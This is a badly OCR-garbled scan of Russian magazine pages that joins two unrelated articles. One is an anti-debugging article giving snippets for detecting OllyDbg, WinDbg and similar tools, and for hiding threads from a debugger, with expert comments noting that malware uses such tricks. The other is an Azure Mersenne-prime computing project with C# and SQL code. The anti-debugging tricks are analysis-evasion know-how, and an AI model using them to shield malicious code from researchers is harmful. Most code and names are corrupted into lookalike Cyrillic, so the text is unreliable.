РЬО_Н Е АР_ѴАЬ 1 РАТЕ_РА ВАМЕТЕРЗ 


0x00000040 


Ріа де (ѴѴіп ХР) 


ѵѵіпсІЬд.ехе 


НЕАР_СЯОѴѴАВІ_Е 


0x00000002 


Н Е АР_Т А 1 1,_СН ЕС К 1 N С_Е N АВ І_ЕО 




НЕАР РНЕЕ СНЕСКІИО ЁМАВІ.ЕО 




НЕАРЗКІРѴДиРДТЮМСНЕСКЗ 


0x10000000 


Н ЕАРѴАЫ ОАТЕРАПАМ ЕТЕВЗЕЫАВЬЕР 


0x40000000 


РІаде (ѴѴіп Ѵізіа, 7) 


НЕДР СЯОѴѴАВІ-Е 


0x00000002 


НЕАРТАІЬСНЕСКІМОЕНАВЬЕР 


0x00000020 


НЕАР_РВЕЕ_СНЕСКІЫС_ЕМАВІЕР 


0x00000040 


НЕАРѴАиРАТЕРАВАМЕТЕВЗЕНАВЬЕР 


0x40000000 


РогсеРІад 


НЕАР_ТАіи_СНЕСКШС_ЕЫАВІЕР 


0x00000020 


НЕАР_РВЕЕ_СНЕСКІМС_ЕНАВІЕР 


0x00000040 


НЕАР_ѴАиРАТЕ_РАРАМЕТЕВЗ_ЕЫАВЬЕР 


0x40000000 



Флаги, по которым можно определить наличие отладчика 





Имя процесса 


Заголовок окна 


Класс окна 


ОІІуОЬд 1,10 


ОИУОВС.ЕХЕ 


ОІІуОЬд- [СРЦ] 


ОкЬУОВС 


ОІІуОЬд ІрІО+НісіеОеЬиддег 


ОИѴОВО.ЕХЕ 


-[СРЦ] 


оиуово 


ОІІуОЬд 2.01 


ОИѴРВС.ЕХЕ 


ОІІуОЬд-[СРи] 


оиѵрвс 


ѴѴіпОЬд 6. 12 


ѵѵіпсІЬд.ехе 


ѴѴіпОЬд:6.12 


ѴѴіпРЬдРгатеСІазз 


ІттипіІуОеЬиддег 1 .85 


Іттипііу ОеЬиддег.ехе 


Іттипііу ОеЬиддег-[СРІі] 


ІО 



Заголовки и классы окон, по которым можно определить наличие отладчиков Значения флагов ЫіСІоЬаІНад, Падв и РогсеРІад, 

показывающие наличие отладчика 



за переполнением. Это также может быть исполь- 
зовано для обнаружения отладчика: 



азпл 

{ 

тоѵ еах, ^5 : [0x30] 

тоѵ еЬх. [еах + 0x18] 

// Адрес начала ку чи 

тоѵ 5* *агѣНеарАсІсІг л еЬх 

тоѵ есх, [еЬх + 0x38] 

// Адрес конца кучи 

тоѵ ЕпсІНеарАсИп, есх 

} 

Неар = (0Ы0К0*)51:ап-1:НеарАсІсІг; 

// Сканируем кучу на предмет наличия 
// ѲхаЬ аЬа ЬаЬ 

-Рог( РЫ0КР іпсіех = 0; іпсіех <=_^ 

ЕпсІНеарАсІсІг - БЕагіНеарАсІсІг; іпс!ех++) 

і III 

іі. (Неаріпсіех / 4 ( == ѲхаЬаЬаЬаЬ) 

ге^игп ігие : 

} 

» ш „• 

Если так поступить с кучей, выделяемой 
для процесса по умолчанию, то можно обойти 
корректировку ІЧЮІоЬаІРІад, производимую неко- 
торыми плагинами для ОІІуОЬд (в частности, ОІІу 
АбѵапсесІ и Нібе РеЬиддег). 

Кроме всего этого, можно использовать АРІ- 
функции НІІОиегуРгосеззНеарІпТогтаІіоп или Віі 
О иегуРгосезвРеЬидІпІогтаііоп, с помощью кото- 
рых можно посмотреть значения флагов кучи. 
Флаги 

* КсЮеЬиддегЕпаЫесІ, 

• КсЮеЬиддегЫоІРгезепІ 

можно лекго проверить, воспользовавшись 
функцией ЫЮиегуЗузІетІпІогтаІіоп, вызвав ее 
с ІпІогтаІіопСІазз, равным 0x23. 

8ЕН (ѴЕН ) ОБРАБОТЧИКИ 

Если установить свой обработчик событий с по- 
мощью функций ЗеШпЬапЫесіЕхсерІіопРіІІег или 



АбсІѴесІогесІЕхсерйопПІіег, а затем сделать в про- 
грамме какое-нибудь исключение, то под отлад- 
чиком установленный нами обработчик вызывать- 
ся не будет, и эта особенность может помочь нам 
зафиксировать факт отладки. 

Используя контекст, передаваемый в обработ- 
чик, можно подправить счетчик команд и после 
выхода из обработчика продолжить выполнение 
команд в нужном нам направлении (код, который 
позволит это сделать, смотри на диске). 

ОСОБЕННОСТИ ОТЛАДОЧНОГО 
РЕЖИМАѴѴШООѴѴ5 

Очень многие АРІ-функции (или их последова- 
тельности) по-разному себя ведут при обычном 
выполнении или при выполнении под отладчи- 
ком. 

К примеру, уже упомянутая функция ОЬдРгіпІЕх 
(или ОиІриЮеЬидЗігіпд) при выполнении под от- 
ладчиком вызывает АРІ йл/ОиегуОеЬидРіІІегЗіаІе, 
а без отладчика вызова этой функции не происхо- 
дит (за счет чего она, собственно, под отладчиком 
дольше и выполняется). Перехватив и отследив 
вызов этой функции, можно засечь факт отладки. 

Благодаря возможности подгружать файлы 
с отладочными символами вместе с загружаемой 
библиотекой в отладчике ѴѴіпОЬд и встроенном 
в ѴізиаІ Зіибіо отладчике можно легко распознать 
их наличие: 



НМООІЛ-Е ИНЬгагу = ІоасНіЬгагу*-- 

ГГпІгсІІІ.сІІГЧ: 

1Е (іпб(С^еа^ЕеРі1еА( ,, п•Ы11.сI1Г , .<-» 
5ЕЦЕК ІС КЕАР. 0.0, 3.0.0^ == -1Э 



// Или вот так 

НМООбіЕ Ы.іЬгаг у = І.оасИ.іЬгагу+- 1 

Хі''п±сІ11, сІІІ'ІХ; 

НАШІ.Е НКез = Ве§іпЦрсІа1:еКе5оигсеА<-< 

("ітЕсііі.сЛГ'.Ѳ^ : 

ІЕ ( Е п сі I) рс1аЕеКе5оигсе А( И К ез. Ѳ) == б ) 

геЬигп ѣгие; 

* * * 



Суть этого кода заключается в том, что под от- 
ладкой при открытии библиотеки, к примеру пісШ. 
сЗІІ, отладчик ждет загрузки файла с символами 
и других манипуляций с файлом открываемой би- 
блиотеки некоторое время делать не позволяет. 

Если для существующего файла сделать 
СгеаІеРіІе с параметром ОРЕІМ ЕХІ5ТІЫ<3, затем 
установить для него НАЫОІЕ_РІ_АО_РРЮТЕСТ_ 
РРЮМ СШ5Е с помощью БеШапсІІеІпІогппаІіоп 
и далее попытаться закрыть все это дело с по- 
мощью СІозеНапсІІе, то под отладчиком вылезет 
исключение, чем мы с успехом можем восполь- 
зоваться: 

• # ■ 




{ 



НАШЬЕ ЬРіІе = СгеаЕеРіІеА^ 

(”гі : /х_1 і1 е5 .'Ьхі" . 0, 0, 0 , 4-- 

ОРЕІУІ_ЕХІ5ТІІ\К5, 0, 0 

5е1:НапсІ1еІпРогта1іоп(ЬРі1е,_*-! 

НАМ ІЕ_РЬАе^ КОТЕ СТ_РК0М_СІ_05Е, 

НАШІ.ЕРІ.А 6 РКОТЕСТ РКОМ СЮ5Е ) : 

С1озеНапс|1е(НРі1е) ; 

гѵо +■ I р п 4- -г 1 г а + 

1 ^ е и і и — і 

} 

ехсерТ (ЕХСЕРТІОіѵ_ЕХЕСІЛГЕ_наі\Ю[_ЕК) 

{ 

Л а |— ; | Л “-р* ІрЧ I [ * 

!_и — кі _У_к д 

1 

V ѣ ■ 

Если учитывать, что отлаживаемый процесс 
должен иметь привилегии отладчика, да и от- 
ладчик, как правило, без административных прав 
запускается редко, то мы можем поиметь нужный 
нам результат. 

Это можно сделать, попробовав открыть си- 
стемный процесс сзгзз.ехе. Если удалось, значит, 
у испытуемого процесса с привилегиями отлад- 
чика все в порядке: 

_* *___+ 

азт 

{ 
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ІпіЗ(ОхСС) 



іт 3(0x00, 0x03) 



ОеЬидВгеак 



ІсеВгеакРоіпІ (ОхРІ 



ІПІ2Р 



ІЩ2С 



Раі$еЕхсерііоп ($ТДТи$ ВПЕАКРОІМТ) 



НаізеЕхсер1іоп(5ТАТІР$_5ІМСІ_Е_5ТЕР} 



Наі5еЕхсер!іоп(ОВС_РНІЫТЕХСЕРТІОЫ_С) 

Наі5еЕхсер1іоп(РВС_тРЕХСЕРТІ0М) 



ЙаізеЕхсерІіоп (РВСС0МТВ01.С) 



ТгарРІад 



Ѵ820088Р1 


ОІІуРЬд 1.10 


+ 


+ 



ОІІуОЬд2.01 



Іттипііу 
РеЬиддег 1 .85 



ѴѴіпРЬдб.01 



ЫапотііеО. 1 









ІсІаРго5.0 












Реакция разных отладчиков на исключения 



саіі С5гСеІРгосе55І0І // Получаем ІсІ 

// с5Г55.ехе 

пюѵ С5Р55ІСІ, еах 

1 



// Пыта емс я открыть сзгб 5 . ехе 

І-Р (0репРгосѲ53(РК0СЕ55 АН АССЕ55. «-■ 
Ѳ , С5К55ІСІ ) != 0) 

геііигп 1:гие ; 

* * * 



Для этих же целей можно задействовать функ- 
цию ОЬд$еЮеЬидРі!і:егЗіа1е, которая возвращает 
ненулевое значение, если процесс выполняется 
с админскими правами и имеет отладочные при- 
вилегии: 



а 5т 

і 

саіі ОЬ^Зе'ШеЬиеРіІ'ІіегЗііаІіе 
п юѵ П ае. еах 

і 

ІІ (Ріае == 0) 



Еще можно попытаться отсоединить от- 
лаживаемый поток от отладчика с помощью 



функции МЗеИпТогтайопТИгеасІ с параме- 
тром ТИгеасІІпТогтаІІопСІазз, равным 0x11 
(ТИгеасІНісІеРготОеЬиддег): 



_азт 

і 

ризИ 0 

риз И Ѳ 

ризИ 0x 11 

ри з И -2 

саіі МІЗеІіІп-Рогта'ЫопТІігеасІ 

} 



П РОЦЕССЫ, ОКНА, БИ БЛ ИОТЕКИ 
И ДРУГИ Е ОТЛ А ДОН Н Ы Е АРТЕФАКТЫ 

Как нетрудно догадаться из заголовка раздела, 
любой отладчик имеет какое-нибудь имя про- 
цесса, открытые окна, загруженные библиотеки 
и драйверы. 

Все это достаточно легко выявить, просто за- 
действовав некоторые функции, любезно предо- 
ставленные в наше распоряжение операционной 
системой. 

Это, к примеру, Сгеа1еТооІИе1р323пар5ІіоІ со- 
вместно с Ргосезз32Ріг5і и Ргосезз32Мех1 для по- 
иска нужного процесса или Рі п сІѴѴі п сіоѵѵ для поис- 
ка нужного окна. 



Если надумаешь использовать этот прием, 
то следует учесть наличие плагинов к ОІІуЭЬд, 
которые контролируют эти функции. В неко- 
торых случаях можно использовать функцию 
(ЗеІЬазіЕггог после вызова нужных функций. Дело 
в том, что некоторые плагины просто имитируют 
неудачное срабатывание этих функций, и несо- 
ответствие возвращенного ошибочного значения 
значению, возвращаемому (ЗеНазІЕггог, поможет 
это выявить. 

Использовав функцию ГЧЮиегуІпІогтаІіопРго- 
сеэз 0x1! (РгосеззРеЬидОЬіесШапсіІе) или 0x1 е 
(РгосеззРеЬидРІадз), можно определить факт 
отладки по наличию различных объектов отладки 
(соответствующий код ты найдешь на диске, при- 
лагаемом к журналу). 

Кроме всего этого, можно определить имя 
родительского процесса, и, если оно отлично 
от ехріогег.ехе или стсі.ехе, возможно, стоит за- 
подозрить неладное. 

ЗАКЛЮЧЕНИЕ 

Конечно же, это не все. Это далеко не все. Тема 
антиотладки глубока, обширна и, наверное, бес- 
конечна, а журнал и объем статьи, к сожалению, 
такими свойствами не обладают. Что ж, наде- 
юсь, у меня будет возможность еще чем-нибудь 
с тобой поделиться по этой теме в следующих 
номерах. ЭЕ 



ОТ ЭКСПЕРТА 

Вячеслав Закоржевский, «Лаборатория Касперского» 

Чем знаменит: крутой парень, настоящий человек-дизассемблер 

В статье приводится хорошая классификация антиотладочных приемов 
и соответствующие примеры. Подобные техники активно используются 
в разном программном обеспечении. Однако стоит отметить, что в исполь- 
зовании антиотладки больше заинтересованы те, кто хочет защитить код 
программы. И это далеко не всегда вирусописатели. Множество техник 
защиты от отладки используется в коммерческих упаковщиках, которые 
применяются для защиты легального ПО от реверса. Злоумышленники, ко- 
нечно, тоже не против усложнить разбор «начинки» своего поделья, но так 
как для них это не несет прямого ущерба (в отличие от софта, для которого 
можно разобрать, например, генерацию кода активации), то и много вре- 
мени на это не тратится. Вирусописатели в первую очередь думают о мо- 
нетизации и защите детектирования своих продуктов, поэтому акценты 
при написании защитных механизмов несколько смещены в сторону обфу- 
скации и прочего. 



Александр Матросов, Е5ЕТ 
Нем знаменит: очень крутой парень 

Антиотладочные приемы встречаются практически в любой вредоносной 
программе. И если раньше разработчики вредоносных программ стреми- 
лись главным образом усложнить антивирусным компаниям анализ и тем 
самым замедлить выход вакцины, то на сегодняшний день засилье раз- 
ношерстных троянцев не требует зачастую досконального изучения вре- 
доносной программы для добавления ее в антивирусные базы. И сегодня 
основная цель разработчиков вредоносных программ состоит уже не в про- 
тивостоянии с аналитиком, а в противодействии различным авторизиро- 
ванным системам для анализа новых образцов вредоносных программ, так 
называемым песочницам. Да и сами антиотладочные трюки ведут себя по- 
рой не очень стабильно на различных ОС или зависят от конкретной версии 
сервис-пака или ядра. Поэтому в современных вредоносных программах 
мы чаще встречаем что-нибудь интересное с точки зрения обнаружения вы- 
полнения на виртуальных машинах, нежели хитрые антиотладочные трюки. 
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Есть у нас в редакции специальные весы, на которых мы взвешиваем добрые и злые деяния 
корпорации МісгозоИ Гениальная ѴѴіпйоѵѵз ХР склоняет их в сторону добра, а вот то, что они сде- 
лали с офигенной, опередившей свое время ѴѴіпсІоѵѵз МоЬіІе 6.x, мощно тянет рычажные весы 
в обратную сторону. Но сегодня речь идет не об операционных системах, а о модных и популяр- 
ных облачных платформах, в сфере которых корпорация тоже неплохо отметилась. 



ВВЕДЕНИЕ 

Раньше многие из ученых не могли и мечтать о по- 
лучении доступа к мощностям суперкомпьюте- 
ров. Покупка их времени по-прежнему остается 
дорогим удовольствием. Однако сейчас многие 
компании на рынке облачных вычислений предо- 
ставляют тестовый доступ к своим ресурсам, ис- 
пользуя которые можно за небольшую плату соз- 
дать собственный кластер. 

Есть множество проектов, посвященных рас- 
пределенным вычислениям для решения важных 
задач: проектирование ускорителей элементар- 
ных частиц, поиск в космическом шуме сигналов 
внеземных цивилизаций... В нашем проекте мы 
будем решать задачу создания распределенной 
системы для поиска простых чисел. 

Из курса математики тебе должно быть из- 
вестно, что простое число — это натуральное чис- 
ло (то есть целое положительное), которое имеет 
ровно два различных натуральных делителя: еди- 
ницу и само себя. К простым числам относятся: 2, 
3, 5, 7, ... перечислять можно бесконечно долго. 
Один из самых известных алгоритмов для вы- 
числения простых чисел — решето Эратосфена, 
Однако существует ряд специализированных 
алгоритмов, которые предназначены для опре- 
деления простоты чисел специального вида. 
Например, тест Люка — Лемера может исполь- 
зоваться для поиска простых чисел Мерсенна, 
которые имеют следующий вид: Мр = 2р- 1 (про- 
стота числа 2р - 1 указывает на простоту числа р). 
Именно данный алгоритм использует проект рас- 
пределенных вычислений СІМР5 ( тегзеппе.огс ). 
В январе 2013 года с помощью этого проекта было 
найдено очередное число Мерсенна: М57885161, 
которое состоит из 17 425 170 десятичных цифр. 

Американская некоммерческая правозащит- 
ная организация Еіесігопіс Ргопйег Роипбайоп 
(ЕРР, Фонд электронных рубежей} обещала на- 
граду за нахождение простых чисел, состоя- 
щих более чем из 108 и 109 десятичных цифр, 



в размере 150 тысяч и 250 тысяч долларов 



Описываемый проект предназначен для поис- 
ка простых чисел Мерсенна. И кто знает — может 
быть, именно ты сможешь найти следующее про- 
стое число и немного подзаработать. 

Одна из компаний, предоставляющих те- 
стовый доступ к своим облачным ресурсам, — 
М іеговой. Для тестирования ѴѴіпбоѵѵз Аіиге она 
дает один месяц «бесплатный кредит» в размере 
200 долларов. Этот кредит ты можешь использо- 
вать для покупки сервисов Агиге по своему усмо- 
трению. Например, за эти деньги можно купить 
три экземпляра ѴѴогкег-сервиса и 50І_ базу дан- 
ных размером 2 Гб. Для получения кредита по- 
требуется банковская карта. Здесь: аоо.аІ/ЗХЭиС 
описан способ использования виртуальной карты 
взамен реальной. Конечно, 200 долларов — это 
не так много, как хотелось бы, но, попросив помо- 
щи у друзей и родственников, ты вполне сможешь 
создать небольшую вычислительную сеть. 

Для разработки проекта системы тебе по- 
надобится ѴѴіпбоѵѵз Ахиге 5ЭК для .ЫЕТ, ко- 
торый можно скачать по следующей ссылке: 
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СТРУКТУРА СИСТЕМЫ 

В структуру распределенной системы вычисле- 
ний входит сервер, несколько вычислительных 
клиентов, а также клиентское приложение, запу- 
скаемое на компьютере пользователя (управля- 
ющий клиент). Каждый из элементов системы — 
проект, отдельно созданный в ѴізиаІ Зіибіо. 

Сервер и вычислительный клиент представ- 
ляют собой облачные сервисы, которые реализо- 
ваны в виде ѴѴогкег-ролей. Клиент, запускаемый 
на компьютере пользователя, реализован в виде 
оконного приложения на основе технологии 
ѴѴіпбоѵѵз Рогтз. При развертывании вычисли- 
тельного клиента можно указать, что должно вы- 
полняться несколько экземпляров роли. В рамках 



одного облачного сервиса несколько экземпля- 
ров одной роли будут выполняться независимо, 
так, как если бы они выполнялись на разных ком- 
пьютерах. 

Задача сервера — раздавать облачным кли- 
ентам диапазоны чисел для их проверки на про- 
стоту, а также регистрировать клиенты, выпол- 
няющие вычисления. Каждый облачный клиент 
выполняет одинаковые действия: он запраши- 
вает у сервера диапазон чисел, которые дол- 
жен проверить на простоту, проводит проверку 
и результаты проверки сохраняет в базу данных. 
Клиент, выполняющийся на пользовательском 
компьютере, служит для управления процессом 
вычислений, а также для взаимодействия с базой 
данных, в которой находятся результаты провер- 
ки чисел. Рисунок поясняет потоки данных между 
элементами распределенной системы. Сервер, 
функционирующий в облаке, должен запуститься 
до начала работы клиентов, так как перед началом 
вычислений клиент должен зарегистрироваться 
на сервере. 

Протокол работы системы следующий. 

1 . Запускается сервер: при запуске сервер счи- 
тывает значение максимального проанализи- 
рованного на простоту числа из базы данных; 
это значение будет использоваться далее 
в качестве инициализирующего; по умолча- 
нию после запуска сервера ему запрещается 
раздавать данные для обработки вычисли- 
тельным клиентам. 

2. Запускаются и регистрируются на сервере 
вычислительные клиенты. 

3. После запуска вычислительный клиент с по- 
мощью таймера начинает запрашивать у сер- 
вера данные для вычислений, однако эти дан- 
ные не будут доступны, пока управляющий 
клиент не разрешит серверу раздачу данных. 

4. Каждому вычислительному клиенту сервер 
выдает одно число (р), определяющее начало 
диапазона из 100 чисел, которые должен про- 
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верить клиент; после того как вычислительным 
клиент получает очередное задание, он начи- 
нает анализ чисел на простоту с помощью те- 
ста Люка — Лемера и записывает результаты 
анализа в базу данных. 

ПРОГРАММНАЯ РЕАЛИЗАЦИЯ 

Сервер 

Сервер описываемой системы представляет 
собой ѴѴСР-службу. Клиент взаимодействует 
со службой, запущенной на сервере, посред- 
ством конечной точки. В состав конечной точки 
входит: 

• привязка, которая задает способ связи клиен- 
та со службой; в нашем проекте служба вза- 
имодействует с клиентами по протоколу ТСР, 
поэтому для создания привязки используется 
класс ІМеІТсрВіпсііпд; 

• адрес, по которому выполняется подключение 
к конечной точке; для протокола ТСР адрес 
записывается в следующем формате: пеі. 
1:ср://<сервер>:<порт>/<служба>; 

• контракт; учитывая возможности развития 
проекта, я реализовал дуплексный контракт, 
то есть в этом случае клиент и служба смо- 
гут обмениваться сообщениями. Дуплекс- 
ный контракт определяет операции, которые 
может вызывать клиент на службе и служба 
на клиенте. Данный контракт описывается 
в виде двух интерфейсов: ЮІІепі (операции, 
которые может вызывать сервер на клиенте) 
и ІЗегѵег (операции, которые может вызывать 
клиент на сервере). 

Клиент для получения данных от сервера вы- 
зывает на стороне сервера метод ОеЮаіа. После 
вызова данного метода вычислительному клиенту 
отправляется степень р числа Мр для его провер- 
ки на простоту с помощью теста Люка — Лемера. 

Одновременно к серверу для получения вы- 
числительного задания может обратиться не- 
сколько клиентов. Поэтому для обеспечения по- 
токобезопасности кода используется оператор 
Іоск. В случае если два потока одновременно 
пытаются получить значение р, один из потоков 
переходит в состояние ожидания (то есть блоки- 
руется), пока другой поток исполняет критиче- 
скую секцию кода. 

Вот так выглядит генерация набора анализи- 
руемых чисел: 

ІПІ32 6е*0а*а() 

{ 

гР_( (ЫогкегРоІе . сопбгоі) && 

(ЫогкегКоІе.р >=^1)) 

{ 

Іоск (іліогкегКоІе Лоскег) 

{ 

// Выдача начальног о числа р 

// диапазона чисел 

// [р; р + 100] 

і-р ( ЫогкегКоІе . р == -1) 

{ 

ЫопкегВоІе.р = 101; 

геіигп 1; 

} 

еізе 

і 

ІпЪ32 Ітр = ЫогкегКоІе. р: 

ЫогкегКоІе . р = 

ІліогкегКоІе .р + 100 ; 

ге^игп_бтр; 

} 

} 

1 



/ ч \ 





> 



Код, выполняющий регистрацию клиента 
на сервере, размещается в методе Педізіег(зІгіпд 
изегМате, зігіпд раззНазН, ЬооІ ізСгеаІе). В зави- 
симости от значения флага ізСгеаІе он выполняет 
различные действия: 

• ізСгеаіе == ігие — на сервере создается учет- 
ная запись пользователя; 

• ізСгеаІе == (аізе — клиент регистрируется 
на сервере. 

Создание учетной записи пользователя 
на сервере выполняет метод АсісЮзег, При по- 
пытке регистрации проверяется наличие инфор- 
мации о пользователе в базе данных (эту провер- 
ку выполняет метод ЗеагсШзег). В случае если 
пользователь не найден в базе или хеш введен- 
ного пароля не соответствует хешу пароля в базе 
данных, на стороне клиента выводится сообще- 
ние об ошибке. 

Учет пользователей ведется с помощью та- 
блицы изегз, в которую входят три поля: 

• ісі — уникальный идентификатор (автоинкре- 
ментное поле); 

• пате — имя пользователя; 

• раззНазН — хеш пароля пользователя, сгене- 
рированного по алгоритму 5НА-512, 

Вот скрипт создания таблицы для хранения 
информации об учетных записях: 

СКЕАТЕ ТАВІ.Е [сІЬо] . [ Ц5ѲГ5 1 ( 

ІСІ ( ]Ш ІРЕМТІТУ(1 . 1 1 ) N01 N1)1. 1_ <-■ 

РКІМАКУ КЕУ . 

пате ( МѴАКСНАК(МАХ) N01 N111 1., 
ра55На5Н ( №ѴАКСНАР ( МАХ ) N01 N00. 

) 

Давай рассмотрим классы, используемые 
в методах АсІсШзег и ЗеагсНІізег для работы 
с базой данных. Переменная сз, передавае- 
мая в качестве параметра в конструктор класса 
ЗдІСоппесйопЗІгіпдВиіІсІег, представляет собой 
строку для подключения к ЗСЖАгиге базе данных. 



В данной переменной хранится адрес сервера 
базы данных, идентификатор и пароль пользо- 
вателя для доступа к серверу, а также некоторые 
параметры подключения. Само же подключе- 
ние создается с помощью класса ЗдІСоппесІіоп. 
Экземпляр класса ЗцІСоттапб используется 
для хранения выполняемой ЗСН--команды. Дан- 
ный класс предоставляет возможность под- 
становки значений в исходное ЗОІ_-выражение. 
Класс ЗдЮаіаВеасіег предназначен для получе- 
ния результатов выполнения 501-команды, 
Организуем поиск учетной записи: 

риЫіс 5ІГІП8 $еагсНизег(5Ігіп§ пате) { 

// Создание строки для подключения 
// к базе изегз 

5д1Соппесбіоп51:гіп§Виі1сІег <м 

сопп51гіп{22Ви і1(Лег = пеы <-■ 

ЗдІСоп п е с ^іоп5^гіп§Виі!сІег(сз) ; . 

сопп5 - Егіп а2В иі1сІег . Іпі~ЕіаІСа~Еа1о§ -<-■ 
ОаІаЬазеІМате; 

/ / Подключение к базе д анных 

БдІСоппесбіоп сопп = пен «-■ 

5д1Соппес1іоп(сопп51:гіпд2Виі1сІег 

То5бгіп§( ) ); 

5д1СоттапсІ соттапб _=_ пиіі; 
БдЮаІаГСеасІег геасіег; 

сопп . Ореп ( ); 

// Выборка информации 

// о пользователе 

5ІГІП8 СоттапсГГехі: = "зеіесі: * -Ргот «-< 
и5егз иНеге (пате = @пате) и ; 

соттапб = пеы 5 д1Соттапс1<-» 

(СоттапсІТехб., сопп); 

сотшапсі. Рагатеіегз . АсІсІ ( "@пате" л 

ЗдЮЬТуре. №ѴагСНаг) ; 

сотліапсі . Рагатебегз [ "(Эпате" ] . «-■ 

Ѵаіие = пате; 

геасіег = соттапсІ.Ехеси1:еКеаеІег() ; 

II Получение результатов выполнения 

// за пр оса 

Ббгіпё пт = " " : 

Ббгіпе І із = 

ыПіІе ( геасіег. Кеаб{ ) ) { 

Из = геас1ег[ , 'ра55ИазИ" ] .^ 

То51:гіп§()_і.Т гіт( ) ; 

пт = геабег[ "пате" ] ЛоБігіпйО .-« 

Тгіт( ) ; 
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} 

сопп .С1озе( ); 

геіигп Из; 

} 

И создаем учетную запись: 

риЬІіс ѵ оісі АсЛсІІі5ег(5І:гіп§ пате л «-■ 
з±гіп% раззЬазН) 

і 

II Созда ние стр оки для по дкл юче ни я 

// к ба зе цБегБ 

БдІСоппесііопБігіп^ВиіІсіег <-< . 

сопп5Сгіп§2Виі1сІег = пем 

5д1СоппесІ:іоп51гіпёВиі1сІег(с5)^ 

сопп5ігіп§2Виі1с1ег . Іпіііа1Са1:а1о§ 

0а"1:аЬа5е№ате.; 

// Текст команды 

зігіп§ СоттапсІТехІ: = " іпзегі: іпіо ±± 
изегз (пате, раззбазіі) ѵаіиез 

([Эпате,, (ЗраззНазЬ)"; 

// Подключение к базе данных 
ЗдІСоппесііоп сопп = аеы_«-< 
5д1СоппесСіоп(сопп5^гіп§2Виі1сІег.^ 

Т05ігІп%()) ; 

ЗдІСоттапсі соттап еі = пек <-■ 

5д1СоттапсІ( СоттапсІТехІ:, сопп); 

соттапеі . Рагатеіегз . Ас1сІ( "(Эпате" , 

5дІРЬТуре.ІУІѴагСНаг) : 

соттапеі. Р арат еіег5[ ''(Эпа те п ] .Ѵ аіие =<-■ 
пате; 

соттапеі . РагашеіегБ . А сі сі( " (ЭраззНазН" .<-> 

БдІРЫѵре . МѴагСНагХі 

соттапеі . Рагатеіегз [ "@ра$зІіазІі'' ] 

Ѵаіие = раБЗІпазІі,; 

сопп.0реп(Х; 

// Д о б авлени е учетной зап иси 

іпі гоизАсісІесІ - соттапеі..-' 
Ехеси1^опС>иегу ( ).; 

сопл.С1озе( X; 

} 

Вычислительный клиент 

Основная (и единственная) задача вычислитель- 
ного клиента — проверять, является ли число Мр 
простым. Проверить простоту числа Мр = 2р - 1 
можно с помощью такой последовательности 
действий (тест Люка — Лемера): 

1 . Задать число І_ а = 4. 

2. В цикле вычислить значение 

I І+1 - - 2) тоР (М р ). 

Таким образом, число Мр является простым, 
если остаток от деления числа Ьр - 2 на Мр будет 
равен нулю. 

Давай рассмотрим пример определения про- 
стоты числа Мр = 31 (р = 5, Мр = 2 5 - 1 = 31 ): 

1. Ц=4. 

2. Ц = (4 2 -2)тос!31 =14. 

3. 1 2 = ( 14 2 - 2) тосІЗІ =8. 

4. І_ 3 = (8 г - 1 ) той 31 =0. 

Тест пройден успешно, следовательно, чис- 
ло 31 простое, 

Тест Люка — Лемера: 

ЬооІ і з Р гіт е ( I п 1:3 2 п) { 

// Проверка на четност ь 

і-р ( п % 2 == 0 1 герц г п ( п == 21: 

0 1 ср 

У. _ -.1- _ Э \Г- 

1 — 

Тог (іпі і _=_ 3^_ і < ~ «-< 

(іпР МаТІі .5дгі(п) : і += 2) 

// Число не простое 

І-Р (п % і == 0) 

геіигп Таізе: 

У/ Выполнение теста 



Ві§Іпіе§ег М р Ві^Іп-ре^ег.^ 

Ром (2 . п) - 1; 

Ві^Іп-ре^ег Ь = 4; 

( і = 3; і <= п; і++) 

І_ = (Ь * I - 2) % М_р; 

ге-Ригп І_ == 0: 

} 

} 

В тесте Люка — Лемера двойка возводит- 
ся в некоторую степень. Результат возведения 
может быть достаточно большим числом. Боль- 
шим настолько, что для его хранения не хватит 
типа РесітаІ. Поэтому в клиентском приложении 
для работы с большими целыми числами исполь- 
зуется класс Відіпіедег, который находится в про- 
странстве имен ЗузРет.Ыитепсз (библиотека 
ЗузІет.Ыитегісз.сІІІ). Переменная типа Відіпіедег 
может содержать любое целое значение. 

Хранение информации о результатах про- 
верки чисел выполняется с помощью таблицы 
питсіаіа, в которую входят следующие поля: 

• ісі — уникальный идентификатор (автоинкре- 
ментное поле); 

• пит — проверяемое число; 

• ізргіте — флаг, содержащий результат про- 
верки (простое / не простое); 

• сіаіе — время записи информации в таблицу; 

• сііепі — информация о клиенте, выполнившем 
проверку. 

Вот скрипт для создания таблицы, хранящей 
результаты вычислений: 



СКЕАТЕ .ТАВЬЕ [бЬо] . [питбаіа ] ( 



ІСІ ( 


П\ІТ ГОЁІШТѴТ 1 . 1 ! 


N 01 


N 1 ) 1 - 1 ^ 


[пит] 


ВІСІІЧТ 


N 01 


N 111 . 1 -., 


Г І 5 ргіте 1 


ІІ\ІТ 


N 01 


N 111 . 1 -., 


[бабе] 


ОАТЕТІМЕ 


N 01 


N 611 , 


сііепі: ( 


ѴАКСНАК (МАХ) 


N 01 


N 611 , 


РКІМАКѴ КЕѴ СШ 5 ТЕКЕ 0 (ІСІ ( 


А 5 С) 








Вставку в таблицу питсіаіа информации 
о результатах вычислений выполняет метод 
ІпзегШо\л/(Іпі32 пит, ЬооІ ізргіте). Логика работы 
данного метода подобна логике метода АсІсІЫзег. 

Управляющий клиент 

Управляющий клиент контролирует отправку дан- 
ных от сервера клиентам с помощью вызова ме- 
тода СопігоІ. Этот метод позволяет запретить или 
разрешить раздачу вычислительным клиентам 
данных для обработки. 

Если выполняется попытка запуска разда- 
чи данных (зіагі == ігие), тогда сервер выбирает 
из базы данных максимальное вычисленное зна- 
чение числа (с помощью метода ЗеІесіІсІ) и ис- 
пользует это значение в качестве начального 
для дальнейших вычислений. 



Если выполняется попытка останова раздачи 
данных сервером (зіагі == іаізе), тогда значение 
флага сопігоі устанавливается в Іаізе (данный 
флаг служит индикатором работы сервера). 

Метод для управления сервером выглядит так: 

риЬІіс ѵоі е Сопігоі ( ЬооІ з іагі) 

{ 

// Ігие . _ 

і.± (зіагі) 

і 

// Обновляем значение р 

МогкегКоІе. к = 1л)огкегКо1е.<-< 

5е1есіІсі(); 

і-р ( Ыогкегйоіе. р >= -1 ) 

ЫогкегКоІе. сопігоі - 5іагі; 



ЫогкегКоІе. сопігоі = Раізе ; 

} 

еізе 

У о г к е г Коіе. сопігоі = 5і а гі ; 

} 

Создание учетной записи клиента и реги- 
страцию клиента на сервере выполняет метод 
СгеаІеОгИедізІег(ЬооІ), Все зависит от значения 
